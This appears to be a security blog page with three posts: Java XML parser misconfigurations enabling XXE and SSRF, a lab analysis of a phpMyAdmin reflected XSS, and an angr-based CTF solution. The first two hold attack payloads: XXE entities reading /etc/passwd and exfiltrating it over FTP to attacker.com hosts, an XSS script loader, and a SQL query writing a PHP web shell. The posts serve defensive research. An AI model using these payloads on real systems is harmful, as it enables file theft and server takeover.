Wednesday, February 17, 2021

Misconfigurations in Java XML Parsers

 

Misconfigurations in Java XML Parsers

XML is a powerful data format that can elegantly encapsulate any conceivable kind of information.  To ensure that this complex data adheres to a pre-defined structure, XML documents can specify a DTD – a helper document that defines the expected structure of the data.  And to help simplify the contents of a complex document, XML allows for External Entities – bits of content that can be included in a document by reference, like a link in a web page.  DTDs and External Entities are additional content for XML software to process, but this kind of software is often written with a focus on the actual XML document, with less attention paid to the details of processing DTDs and External Entities.  An XML External Entity attack, or XXE attack, attempts to find vulnerabilities in software that processes DTDs and External Entities of XML documents.

In particular, Java applications using XML parser libraries are often vulnerable to XXE because the default settings for most Java XML parsers is to have DTDs processing and external entities enabled.

The definitive solution to avoid XXE issues is to disable DTDs (and External Entities) processing. However, for several reasons, developers do not disable it completely. It could be by mistake because the application parser needs DTDs or because it is simply not possible to do it. When DTD processing is necessary, in order to avoid XXE issues, developers should disable external entities and external document type declarations.

Disabling these features varies, depending on each parser which, in some cases, could be confusing for the developer and could lead to misconfigurations that expose the application to a security issue. In the present article we will be discussing a few scenarios and offer a novel one that is not always considered.

Let’s start by taking a look at javax.xml.parsers.DocumentBuilderFactory:

File fXmlFile = new File("Test.xml");
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder dBuilder = dbFactory.newDocumentBuilder();
Document doc = dBuilder.parse(fXmlFile);


This is the default configuration for DocumentBuilderFactory which IS affected by an XXE issue.
 
Occasionally, I have seen the following settings in the DocumentBuilderFactory object to try to remediate the security hole:

dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false); 


This configuration does prevent XXE attacks as well as Xinclude attacks. It does not, however, prevent Server-Side Request Forgery (SSRF), since DTD processing is still enabled. One way to abuse this is to use a "Public" entity such as:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE myPublicEntity PUBLIC '-//W3C//DTD HTML 4.01//EN'
'http://someIP:4444/IMMUNITY' >


But what if we use the following settings:

dbf.setFeature("http://xml.org/sax/features/external-general-entities", false)        
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);


This will protect against XXE, since external entities are disabled, as well as external parameter entities. However, we can still perform SSRF with the help of "Public" entities. In order to fix this, the developer needs to add the following setting:

dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);


This will prevent against SSRF using 'Public' entities. Of course, it would be safer to disable the DTDs completely by using:

dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);



Let’s try again, what if we use:

dbf.setAttribute(XMLConstants.FEATURE_SECURE_PROCESSING, true);



The Java 7/8 documentation reference says:


But this configuration does not prevent XXE or SSRF and, honestly, I couldn't find any difference using this setting during my tests. Maybe the objective is only to prevent against DoS (as mentioned in the documentation).


Then we have:


This feature could bring some confusion and a false sense of security to developers, as it doesn't provide any protection against XXE or SSRF through "Public" entities.



Let's look at another example, using the javax.xml.validation.SchemaFactory:

String filepath = "Test_Schema.xml";
String xmlSchema = new String(Files.readAllBytes(Paths.get(filepath)));

SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");           
Schema schema = factory.newSchema(new StreamSource(new StringReader(xmlSchema)));


This code excerpt is by default affected by XXE. The general recommendation is to put the following in order to prevent XXE issues:

factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");


Both flags are pretty much the same and allow the developers to enable and disable which protocols are available. The documentation about them says:

     Default value: The default value is implementation specific and therefore not specified.                 The following options are provided for consideration:

      1. an empty string to deny all access to external references;
      2. a specific protocol, such as file, to give permission to only the protocol;
      3. the keyword "all" to grant permission to all protocols.



Now, let's analyze the following configuration:

factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "file");
factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");


The first line allows only the use of the file protocol, and it seems that the feature "ACCESS_EXTERNAL_DTD" has prevalence over "ACCESS_EXTERNAL_SCHEMA", which is configured to deny all access to external references.


This configuration is affected by a classic XXE injection issue if the results of the parsing are returned to the user. If you remember, the 'Classic' payload uses *file* protocol:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM 'file:///etc/passwd'>
]>
<foo>&xxe;</foo>


However, this configuration appears to prevent a Blind XXE because http/s and ftp are not allowed. Therefore, if the app does not show the results to the user (no classic XXE injection is possible), this configuration seems safe by preventing Blind XXE attacks. Turns out this isn't true.

By digging a little bit deeper on the JDK protocol handlers, last year I discovered that it is also possible to exfiltrate a file using FTP without using the ftp schema directly.

Analyzing the method openconnection() from sun.net.www.protocol.file.handler class, it is possible to make an FTP request if the URL is not null nor “” nor “~” or not equal to “localhost” (1). Therefore, with simply an IP address we can enter in this section of the code and it is easy to see that it is creating a URL instance using “ftp” (2). No port is passed as parameter and the handler uses the default port for FTP, port 21. Then the openConnection() method from the URL class is called to perform the connection via FTP (3).



Therefore, this configuration does not mitigate a Blind XXE, as we can still use the FTP via file protocol.


Exploitation


The procedure to leverage this issue will be like the 'Out of Bounds' XXE or Blind XXE, however in this case, it will require two FTP services, one to host the malicious dtd and another one to receive the content of the file that we want to exfiltrate. Remember we need to use in both cases the default port for FTP, port 21. 

This is the XML payload:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM  "file://attacker.com:5555/evil_ftp.dtd">
  %dtd; 
]>
<data>&send;</data>



Again, the port does not affect the behavior. It will always use the FTP default port.

This is the content of the evil_ftp.dtd:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY send SYSTEM 'file://attacker2.com:5555/%file;'>"> 
%param1;


Now we need to host the evil_ftp.dtd  using a FTP server. 


The steps are the following:
    1. Host the _evil_ftp.dtd_ file, which should be in the current directory, using:
    sudo python xxeftp_mod.py
    2. Start the ftp service in another host:
        sudo python xxeftp.py
    3. Send the XML payload to the parser.
    4. Profit!



If you want to test it, you can use the _/jaxp/InlineSchemaValidator.java_ sample provided by
Xerces2 source code in its latest release [Xerces-J-src.2.12.1.tar.gz]  (https://apache.dattatec.com//xerces/j/source/Xerces-J-src.2.12.1.tar.gz). 

This sample application is vulnerable by default to XXE and it can be use it to test some of the anti-XXE features that I described in this post. To test the OOB Technique using the 'file' payload you only need to add "ACCESS_EXTERNAL_DTD" attribute to the javax.xml.parsers.DocumentBuilderFactory instance located at line 479.


Final Comments

    1. If the XML parser has DTD processing enabled, analyze all the other settings instead. The applied settings could lead to other vulnerabilities (less serious but still important as SSRF). 
    2. Check it on a local environment, create an XML parser with the same settings and test it. You can also debug it and analyze it.
    3. Sometimes the XML Parser settings do not do what it seems, you need to track them down through the code.
    4. The best solution is to disable DTD processing completely.
    5. Some things about the exfiltration: Latest updates of Java 7 (1.7_80) and 8 (1.8.0_281) does not allowed illegal characters in an FTP's URLs, so it is no longer possible to exfiltrate files containing LF (Line Feed) characters, like /etc/passwd, however you can still exfiltrate /etc/issue as a simple Proof-of-Concept. This URL validation is present in the FTP handler since Java version 11.


~Anibal Irrera


Wednesday, February 6, 2019

PHPMyAdmin 3.5.X-3.5.8 Reflected XSS: What could have been, but really wasn't.

(This blog post is from Leff (Lautaro Fain), one of our consultants, and I asked him to do a special project, as documented below.)

1. Introduction

A few days ago Dave asked me to take advantage of a known vuln affecting PHPMyAdmin MySQL Management Platforms (Versions 3.5.X to 3.5.8) in order to gain a Web Shell or Admin Rights Access to the server. It was nothing more than a common Reflected Cross-Site Scripting issue taking place in an ‘in attribute’ context. The vuln is conveniently described in the links below:

https://www.first.org/cvss/examples#1-phpMyAdmin-Reflected-Cross-site-Scripting-Vulnerability-CVE-2013-1937

https://www.exploit-db.com/exploits/38440

This is the theoretical severity scoring from the team at FIRST:




This document enumerates the ways I tried to exploit this issue, and provides a more accurate ranking of the vulnerability’s technical risk.

2. Exploitation Phase

Taking a closer look at the issue...




As soon as the task was given, I grabbed a vulnerable PHPMyAdmin version (this being 3.5.1, https://www.phpmyadmin.net/files/) and began the installation process in order to make a local lab to test the issue.

Once the ‘server’ was running smoothly (fixed some issues and then ran ‘php -S localhost:8085’ in a terminal), I decided to take a look at the vulnerable files to see by eye if the issue was present.



After reaching the ‘tbl_gis_visualization.php’ file and reading the code, we get to infer that ‘visualizationSettings[‘width’]’ and ‘virtualizationSettings[‘height’]’ parameters are indeed our entrypoint to exploit this vulnerability as they get rendered back in the HTML code without taking any kind of sanitization process.



To keep going forward, we would need to test if the statement provided above is correct and then try to exploit this issue with our bare hands. To first confirm that we are right, a simple XSS Payload (“><script>alert(‘Immunity INC.’)</script>) was provided and executed within the context of an already logged in user (‘root’ in this case).



Analyzing possible attack vectors

It worked as expected - we are for sure facing an ‘In Attribute’ Cross-Site Scripting vulnerability. Now, let's check if we can make some malicious things out of that. For further understanding, let me explain the two most common techniques that are used to take over PHPMyAdmin or MySQL Servers.

a) The ‘SELECT INTO OUTFILE’ technique: So, by its very own nature, PHPMyAdmin gives us the chance to execute SQL Queries through a web interface and, as our objective would be creating a new PHP file that works as Web Shell, this is almost a win-win situation for us. We go straight to the objective and run the necessary queries to check if indeed this can be done from here (‘SELECT "<?php system($_GET['cmd'])?>" INTO OUTFILE "/imm_shell.php";’) but well, it's not that easy.



MySQL Servers have this tiny global variable called ‘secure_file_privs’ which is used to specify which directories the client can write on. Let's take a look at it by using: ‘SELECT @secure_file_privs;’.

HA! Can’t get surprised anymore, this variable is set to ‘NULL’ by default and in real case scenarios, the database admin will set it to allow writing in directories that are NOT exposed to the outside world (like ‘/tmp’ or ‘/custom_dir’ instead of using ‘/var/www’ to create temporary files or storing persistent files). Anyways, as we all know, there can still be some cases where this variable allows MySQL file writing in root web server directories (yes, I'm mentioning ‘/var/www’ again as an example) that can be accessed through the browser which means that this technique (if possible to achieve) will get us an immediate web shell!

But sadly, this is not the case for us, and as this variable cannot be set through PHPMyAdmin (it needs to be changed from the ‘my.ini’ file within the MySQL folder) queries or configuration environments, we can't bypass this.

b) Creating a New Privileged User through SQL Queries: This is another possible attack vector, we can execute the queries needed to create a new user in the database, this user would need to have enough privileges to do the same things as the ‘root’ or ‘admin’ user usually does. Sounds good, let's make it happen (using this query ‘GRANT ALL PRIVILEGES ON *.* TO 'immtest'@'localhost' IDENTIFIED BY 'immtest';’):



Let’s log in with this new credentials, they might work as expected.





Awesome, they do work and have all the possible privileges! But wait, do you remember that we created this user while logged in with the ‘root’ user credentials, right? Not cool - what if during a real case scenario we manage to find credentials that belong to a less privileged user, can we still make this happen? Let's check this with another user, we will create it as a default user and then create a new user with that account.





New user created, as you may have seen, he cannot see anything apart from the classic system tables. Let's suppose we have grabbed his credentials and we want to create a new user, but this time with this ‘immtest_nopriv’ account.





Okay, not surprised again. What is happening here? We cannot create a new user having all the privileges from an account that doesn't have enough privileges to do so, this means, that if the credentials we grabbed are not supposed to create users with the greatest possible privileges (that is set by the database admin) we won't be able to create an user which can do anything else than reading system tables or even, we won't neither be able to create a new user.

So, where do we stand here? Well, we can still make use of our XSS issue to execute queries inside PHPMyAdmin - so let’s create a payload to make that happen!

Creating our payload

For length reasons, this payload will need to be created as a single Javascript file and be served in a malicious server so we can retrieve it when trying to exploit our vulnerability.

To begin, as always, we grab the POST request made from the client side to the server using Burp so we can check the sent parameters and values to replicate that in our code.




We modified the ‘sql_query’ with some SQL Instructions (that being ‘GRANT ALL PRIVILEGES ON *.* TO 'xssuser'@'localhost' IDENTIFIED BY 'xssuser';’) parameter to check if everything runs smoothly and we can indeed send whatever query we want to the server side.



Awesome, the user we created now exists, this means that all works as expected. Let’s dive into the Javascript code creation.




Some explanation might come in handy, so i will enumerate some of the payload behaviour below:

  1. We need to grab the victim’s token before doing any request, it works as a ‘csrf’ and sort of session token as once (despite PHPMyAdmin also using the widely known ’phpMyAdmin’ cookie). That's what the first line does, we dynamically retrieve that from a hidden input in the vulnerable web page using javascript.
  2. The desired query to execute is specified on the second line.
  3. We replicated the HTTP POST Request  body, so the server gets what it expects and nothing more than that (third line).
  4. The target endpoint is set at the sixth line.
  5. And finally, we use JavaScript built in ‘fetch’ function to make an HTTP POST request that bypasses CORS and then sends another GET request to our malicious server specifying the response status as an endpoint.

As you might expected, this is not a difficult thing to do. We can now exploit this vulnerability referencing our malicious code.

Yay! Time to exploit this thing!


We change the ‘sql_query’ parameter to hold whatever we want to, this time, i will create another user called ‘leff_exploit_test’ to check that it works.



After hosting the file in our malicious server, and exploiting the scenario (we got 200 as a HTTP Status!) we can test if the user was indeed created.







Awesome, this worked! This is a Reflected XSS Vulnerability, we will use this to make victims execute arbitrary Javascript code within their browser when clicking a specially crafted link. Let’s try that!

3. Showstopper realizations


Time to reach the finish line, this link will be the one that triggers the exploit we made:


http://localhost:8085/tbl_gis_visualization.php?db=information_schema&token=550a80691c075e6b4a4e0c9f410a1db4&visualizationSettings[width]=%22%3E%3Cscript%20src=%22http://localhost:5555/test.js%22%3E%3C/script%3E


But wait, did you notice something? The token value also travels in the GET request. THAT’S NOT GOOD! We cannot exploit that, since that that token belongs to the user himself and there’s no way we can retrieve it before crafting the malicious url (at least in the position we are now). We can try some things to see if the server does not enforce proper checks to that attribute. Can we send requests to the server without providing the correct token or not providing a token at all? Common tests involve:

  1. Sending an empty token parameter.
  2. Sending a badly crafted token parameter.
  3. Not sending the token parameter.
  4. Sending the token parameter as an array type parameter (Just for PHP Servers).
  5. Sending the token parameter holding a null value.












After trying all of these options none of them seemed to work as our malicious server didn’t get involved in any request. It was still immutable since the first time we exploited the issue.



There is still one more thing to check - is this token predictable? If so, we might still have a chance to abuse this issue, lets search the code that generates this attribute value. Following its trail led us to the ‘url_generating.lib.php’ file, seems that the actual token value is being retrieved from the session object, and so on, created there.



We need to search for ‘PMA_token’ instead of the ‘token’ word now.



So, we found this again, but if you look carefully, the token is crafted in the following way:

  1. rand() is called with no fixed or predictable value as an input, which discards any kind of prediction to know what value can be retrieved from that function call. When called that way, rand() returns a pseudo-random integer between 0 and getrandmax().
  2. The output of that call is passed as an input to uniqid() along with ‘true’ which means that an unique ID will be generated with a length of 23 characters instead of 13, adding even more entropy to the result.
  3. That output is the input of a MD5 hash function and that would be the last value that is assigned to the token
  4. On Windows platforms, there is some discussion of the value of uniqid being predictable to a “second” of resolution, but this does not seem likely to be fruitful with our particular code-path (which has more_entropy=true)

Finally, we can infer this token works as an Anti-CSRF one, and prevents us from crafting malicious links that when clicked will make victims execute our desired MySQL queries on their server.

4. Conclusion

As we seen above, this vulnerability cannot be exploited in the wild as we would need to first predict in some way the necessary token to perform those requests. We will need to reassign a proper CVSS (v2 & v3) Score to each of the cases we have here, being them:
  1. We have the possibility to predict the needed token.
  2. We cannot predict the needed token.
So, before going into that phase, let’s analyze each score metric for each vulnerability case:

CASE A

I will walk you through ‘Case A’ first, a scenario were we can (by some sort of way) predict the token that is needed to perform requests to execute arbitrary MySQL queries in the backend server. For the score calculation we will keep in mind the worst case scenario (or the best for the attacker) which involves a not properly configured backend database and an user who has enough privileges to execute and do whatever he wants there.

As queries can be sent by triggering the XSS, the old ‘SELECT INTO OUTFILE’ technique can also be used to compromise the server with a shell and the attacker will be able to read whatever he wants, dump whatever he wants and modify the integrity of what he wants thus affecting directly the Confidentiality, Integrity and Availability of the whole service. All of this will be triggered after the user clicks the pre-crafted malicious link that the attacker provided. Keep in mind that the potential impact on the database is what increases the severity of the issue itself and that the victim user needs to be logged in when clicking the link (as with any XSS).

CVSS v2.0 (Predictable token);
Overall CVSS Score: 5.6 (AV:N/AC:H/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C)

CVSS v3.0 (Predictable token);
Overall CVSS Score: 8.0 (High) (AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C)

CASE B

In ‘Case B’, which is the most realistic one, this issue cannot be used to target another user. In the actual conditions this is just a Self-XSS (also known as “not a vulnerability” or CVSS v3.0 score of 0) because we cannot predict the token of the victim user to then use it for the malicious URL crafting process, we can only get access to our token to trigger the vulnerability only in our side once we have already logged in. This bug is not exploitable within the described context. It’s worth noting that at no point does HTTPOnly on the cookie come into our analysis, as mentioned in the original FIRST.org analysis.

Wednesday, November 2, 2016

Solving Sokohashv2.0 full of Angr on Ekoparty 2016



In memory of Pocho, the Panther. RIP buddy.


Last Ekoparty I got the chance to try my luck solving one of Core Security challenges. For a while I have been hearing great things about angr so I wanted to get to the solution using it.

Angr is a Python binary analysis framework that provides a quite clean API to a powerful symbolic executor (built around vex intermediate code) and a solving back-end (provided by a z3 wrapper called claripy). 

I have to admit that it took me a while to solve the challenge (I did not win :( ), I have only my own very limited intellect and lack of familiarity with the tool to blame. But what I lack in intelligence I have in perseverance so let us solve this with, as always, maximum effort.

The Sokohash V2 challenge imitates the rules of the known Sokoban puzzle game (https://en.wikipedia.org/wiki/Sokoban). Through a Rogue-like interface you get four "boxes" (x,y,z,w) that the player has to move to their corresponding correct positions. 


Sokohash interface - it is a bit off because I ran it in Wine :P
Unlike Sokoban there are no limits to the number of steps or pushes the player can make. In Sokohash, the game assigns a hash to each position on the board, then on each movement it takes the hashes of each box and calculates a global hash with the current state of the board. The objective of the challenge is to have that global hash match the winning hash:

C03922D0206DC3A33016010D6C66936E953ABAB9000010AE805CE8463CBE9A2D

As I want to get a sense of what angr can do for me, I’ll keep my binary analysis to a minimum. I basically have the following needs:

  • Identify were the global hash is calculated
  • Identify were the hash was stored.
  • Identify the function input and verify how it was related to the boxes coordinates/hashes.
  • Model the hash calculation with angr.

First we need to locate the function that calculates the hash. This is a simple step, we take a look at the strings with IDA and "Calculating hash..." takes us to the right spot.






After that, It was pretty straightforward to locate the function input by putting a breakpoint at the correct place, in my case 0x40101a (*). After the canary the function copies 32 bytes from stack and a uses them as local data. Just by looking at the process screen is evident that those 32 bytes correspond to the hashes of each of the boxes, 8 bytes each, the position of the player seems to be irrelevant. 

(*) I run the Win32 binary with Wine and debugged with GDB. Why? Because I was feeling wild and reckless.



Then we look for the place were the calculated hash is stored, this is also easy by using IDA/GDB. 






So now we know what the input is and where the output is stored. We might as well spin angr and see what it says. We are going to tell angr to find a path between start_addr and to_find. As the input values that will cause the function to walk that path will evidently be not unique (there are barely any code constraints between the start and end) we will also need to tell angr that we expect the input values to produce the winning hash by setting specific logical constraints on the resulting path.

As the output hash is not stored in memory in a linear fashion I just made a helper Python function help set up the constraints on the memory output.

import angr
import sys
import simuvex
import struct
from itertools import combinations, product

WIN_HASH = "C03922D0206DC3A33016010D6C66936E953ABAB9000010AE805CE8463CBE9A2D".decode("hex")

def do_nothing(state):
    pass

def do_repmovsd(state):
    # angr does not like rep movsd
    # we do it by hand
    buffer = state.memory.load(state.regs.esi, 8 * 4)
    state.memory.store(state.regs.edi, buffer)

def get_hash_map(init_addr):
    # Helper function to get each address were a byte of
    # of the calculated hash is going to be stored in the 
    # proper order
    addr = init_addr
    hash_map = []
    for i in xrange(0, len(WIN_HASH), 2):
        pair = WIN_HASH[i:i+2]
        hash_map.append((addr, ord(pair[1])))
        hash_map.append((addr+1, ord(pair[0])))
        addr += 8    

    return hash_map


def main():
    proj = angr.Project('sokohashv2.0.exe', use_sim_procedures=True, load_options={"auto_load_libs": False})

    # ADDRS 
    main = 0x401013 # The start of our path, just after the canary
    to_find = 0x0040123E # The end, just before the security check
    hash_addr = 0x04216C0 # The address were the output hash will be stored

    # HOOKS - We avoid any function call that does not alter
    # our result
    func_hooks = [0x0040102C, 0x0401033]
    for addr in func_hooks:
        proj.hook(addr, do_nothing, length=6) 

    func_hooks = [0x401215, 0x40121E, 0x401239, 0x40123C]
    for addr in func_hooks:
        proj.hook(addr, do_nothing, length=2) 

    # We need to hook the rep movsd because the symbolic execution
    # fails to resolve it. We model it by hand
    proj.hook(0x0401028, do_repmovsd, length=2)
    proj.hook(0x0401253, do_nothing, length=5) 
    proj.hook(0x040103E, do_nothing, length=5) 
    proj.hook(0x0401225, do_nothing, length=5) 
    proj.hook(0x0401243, do_nothing, length=5) 

    # initial state
    init = proj.factory.blank_state(addr=main)
    
    # we set some registers to get a context closer to real world
    init.regs.ebp = init.regs.esp + 0x78
    buffer = init.memory.load(init.regs.ebp + 0x8, 0x20)
        
    pg = proj.factory.path_group(init, threads=8)
    pg.explore(find=to_find)

    path = pg.found[0]

    found = path.state

    # We print the expected hash for verification
    conds = []
    expected = []
    hash_map = get_hash_map(hash_addr)
    for addr, value in hash_map:       
        memory = found.memory.load(addr, 1, endness=proj.arch.memory_endness) 

        # Here we declare that each byte in the output hash must be
        # part of the winning hash
        conds.append((memory == value))
        expected.append((hex(addr), hex(value)))
    print "Expected is '%s'\n\n" % expected

    found.add_constraints(init.se.And(*conds))

    # We print the resulting hash for verification
    result = []
    hash_map = get_hash_map(hash_addr)
    for addr, value in hash_map:       
        buf_ptr = found.memory.load(addr, 1)
        possible = found.se.any_int(buf_ptr)
        result.append((hex(addr), "0x%x" % possible))
    print "Result is '%s'\n\n" % result

    # Print solutions
    possible = found.se.any_n_int(buffer, 1) # We ask for the first solution
    for i, f in enumerate(possible):
        out = "%x" % f
        if len(out) < (0x20*2):
            continue

        names = ["x","y","z","w"]
        values = []
        for j in xrange(0, len(out), 16):
            value = out[j:j+16]
            unpk_value = struct.unpack("<Q", value.decode("hex"))[0]

            values.append((names[j//16], "%.16x" % unpk_value))
        print "\tSolution %d: %s" % (i, values)


if __name__ == '__main__':
    #angr.path_group.l.setLevel('DEBUG')
    main()

If we run it we get:



Bingo! But if we check the solution on the actual game we won't get the winning hash. We can think that maybe there are more than one solution and just ask the solver for more of them by using the line:

...
possible = found.se.any_n_int(buffer, 10) # Give me 10 solutions if possible
...





With lots of solutions checking each one will be very time consuming and we may never arrive at the correct one. As we narrow the output using constraints maybe we also need to narrow the input. To do this we need to ask ourselves the question: What is the relationship between the position hash and the box coordinates? 

Turns out that by looking at the caller of "x_calc_hash" we can see that the coordinates are used to read data from memory. If we take a look at the memory region where the data is read from it is full of hashes, turns out that each hash correspond to a board position. Then it will be ideal to find were those hashes are stored, dump them and then using them to add the proper constraints. We do that finding the first and last hash and then finding their memory address with GDB.





We can easily map each hash to a coordinate using python but first we need the x,y coordinate pairs. The board is 27x17 but we also need to consider there are positions on the board that cannot be reached (the portal, the letter in "CORE", inside letters). To get an accurate coordinate map we need to exclude these positions from it, for example, using the function below:

def get_valid_coords():
    var = """#                            #
#            O               #
#         x                  #
#                   w        #
#           *                #
# ##    ####   ######   ###  #
##  #  ##  ##  ##  ##  ##    #
##     ##  ##  ##  ##  ##    #
##     ##  ##  #####   ####  #
##     ##  ##  ## ##   ##    #
##  #  ##  ##  ##  ##  ##    #
# ##    ####   ##  ##   ###  #
#                            #
#                            #
#                      yz    #
#                     O      #
/                            #
#                            #
"""

    valid = []
    invalid = (list(product(range(7,12),[9,10])) +
               list(product([7,8],[17,18])) )

    x = 1
    for line in var.splitlines():
        line = line.strip()
        line = line[1:len(line)-1]
        y = 1
        for i in line:
            if i not in ["O", "#", "/"]:
                if (x,y) not in invalid:
                    valid.append((x,y))
            y += 1
        x += 1   

    return valid

After we just need to load our memory dump and read the hashes, I will also store the dump in symbolic memory in case angr accesses it. 

def do_memset(state):
    addr = 0x417490
    with open("matrix.bin","rb") as f:
        content = f.read()
        for i in content:            
            state.memory.store(addr, state.se.BVV(ord(i), 8 * 1))
            addr += 1

    start_off = 0x41d450 - addr
    end_off = 0x41e0c8 - addr
    coords = []
    for i in xrange(start_off, end_off+8, 8):        
        coords.append(struct.unpack("<Q", content[i:i+8])[0])

    return coords 

After this we just map hashes to coordinates:

    coords = do_memset(init)
    coord_dict = {}
    count = 0
    for i in get_valid_coords():
        #print "%s = %.16x" % (i, pos[count])
        coord_dict[coords[count]] = i
        count += 1

So now we have a map of hashes to coordinate pairs. The only thing remaining to tell angr is that each box hash is in that map and that each box has to have a different hash (boxes cannot be stacked), to do this we apply constrains to each of the 8 byte input hashes.

   # search only for possible coords
    variables = []
    for i in xrange(0, 4):
        var = init.memory.load(init.regs.ebp + 0x8 + (0x8*i), 0x8, endness=proj.arch.memory_endness) 
        variables.append(var)
        conds = []
        for p in coords:
            conds.append(p == var)
        init.add_constraints(init.se.Or(*conds))

    # each coordinate must be distinct
    for v1,v2 in combinations(variables, 2):
        init.add_constraints(v1 != v2)


We run it and…




:) 

This is by no means the only solution and I have barely scraped what Angr has to offer (multi-arch symbolic debugging with integrated solving seems fancy :> ) but I can say is joy to play with and to add to one's toolbox. 

Facuman
@facuman

---
Below is the full solution:

import angr
import sys
import struct
from itertools import combinations, product

WIN_HASH = "C03922D0206DC3A33016010D6C66936E953ABAB9000010AE805CE8463CBE9A2D".decode("hex")


def get_valid_coords():
    var = """#                            #
#            O               #
#         x                  #
#                   w        #
#           *                #
# ##    ####   ######   ###  #
##  #  ##  ##  ##  ##  ##    #
##     ##  ##  ##  ##  ##    #
##     ##  ##  #####   ####  #
##     ##  ##  ## ##   ##    #
##  #  ##  ##  ##  ##  ##    #
# ##    ####   ##  ##   ###  #
#                            #
#                            #
#                      yz    #
#                     O      #
/                            #
#                            #
"""

    valid = []
    invalid = (list(product(range(7,12),[9,10])) +
               list(product([7,8],[17,18])) )

    x = 1
    for line in var.splitlines():
        line = line.strip()
        line = line[1:len(line)-1]
        y = 1
        for i in line:
            if i not in ["O", "#", "/"]:
                if (x,y) not in invalid:
                    valid.append((x,y))
            y += 1
        x += 1   

    return valid

def do_memset(state):
    addr = 0x417490
    with open("matrix.bin","rb") as f:
        content = f.read()
        for i in content:            
            state.memory.store(addr, state.se.BVV(ord(i), 8 * 1))
            addr += 1

    start_off = 0x41d450 - addr
    end_off = 0x41e0c8 - addr
    coords = []
    for i in xrange(start_off, end_off+8, 8):        
        coords.append(struct.unpack("<Q", content[i:i+8])[0])

    return coords

def do_repmovsd(state):
    # angr does not like rep movsd
    # we do it by hand
    buffer = state.memory.load(state.regs.esi, 8 * 4)
    state.memory.store(state.regs.edi, buffer)

def do_nothing(state):
    pass

def get_hash_map(init_addr):
    addr = init_addr
    hash_map = []
    for i in xrange(0, len(WIN_HASH), 2):
        pair = WIN_HASH[i:i+2]
        hash_map.append((addr, ord(pair[1])))
        hash_map.append((addr+1, ord(pair[0])))
        addr += 8    

    return hash_map


def main():
    proj = angr.Project('sokohashv2.0.exe', use_sim_procedures=True, load_options={"auto_load_libs": False})

    # addrs 
    main = 0x401013
    to_find = 0x0040123E
    hash_addr = 0x04216C0

    # hooks
    func_hooks = [0x0040102C, 0x0401033]
    for addr in func_hooks:
        proj.hook(addr, do_nothing, length=6) 

    func_hooks = [0x401215, 0x40121E, 0x401239, 0x40123C]
    for addr in func_hooks:
        proj.hook(addr, do_nothing, length=2) 

    proj.hook(0x0401028, do_repmovsd, length=2)
    proj.hook(0x0401253, do_nothing, length=5) 
    proj.hook(0x040103E, do_nothing, length=5) 
    proj.hook(0x0401225, do_nothing, length=5) 
    proj.hook(0x0401243, do_nothing, length=5) 

    # initial state
    init = proj.factory.blank_state(addr=main)
    
    coords = do_memset(init)
    coord_dict = {}
    count = 0
    for i in get_valid_coords():
        #print "%s = %.16x" % (i, pos[count])
        coord_dict[coords[count]] = i
        count += 1

    init.regs.ebp = init.regs.esp + 0x78

    # search only for possible coords
    variables = []
    for i in xrange(0, 4):
        var = init.memory.load(init.regs.ebp + 0x8 + (0x8*i), 0x8, endness=proj.arch.memory_endness) 
        variables.append(var)
        conds = []
        for p in coords:
            conds.append(p == var)
        init.add_constraints(init.se.Or(*conds))

    # each coordinate must be distinct
    for v1,v2 in combinations(variables, 2):
        init.add_constraints(v1 != v2)

    buffer = init.memory.load(init.regs.ebp + 0x8, 0x20)
        
    pg = proj.factory.path_group(init, threads=8, save_unconstrained=True)
    pg.explore(find=to_find)

    path = pg.found[0]

    found = path.state

    # Resulting hash must be winning hash
    # Print expected hash and resulting hash for verification
    conds = []
    expected = []
    hash_map = get_hash_map(hash_addr)
    for addr, value in hash_map:       
        memory = found.memory.load(addr, 1, endness=proj.arch.memory_endness) 
        conds.append((memory == value))
        expected.append((hex(addr), hex(value)))
    print "Expected is '%s'\n\n" % expected

    found.add_constraints(init.se.And(*conds))

    result = []
    hash_map = get_hash_map(hash_addr)
    for addr, value in hash_map:       
        buf_ptr = found.memory.load(addr, 1)
        possible = found.se.any_int(buf_ptr)
        result.append((hex(addr), "0x%x" % possible))
    print "Result is '%s'\n\n" % result


    # Print solutions
    possible = found.se.any_n_int(buffer, 1)
    for i, f in enumerate(possible):
        out = "%x" % f
        if len(out) < (0x20*2):
            continue

        names = ["x","y","z","w"]
        values = []
        for j in xrange(0, len(out), 16):
            value = out[j:j+16]
            unpk_value = struct.unpack("<Q", value.decode("hex"))[0]

            values.append((names[j//16], coord_dict[unpk_value]))
        print "\tSolution %d: %s" % (i, values)


if __name__ == '__main__':
    #angr.path_group.l.setLevel('DEBUG')
    main()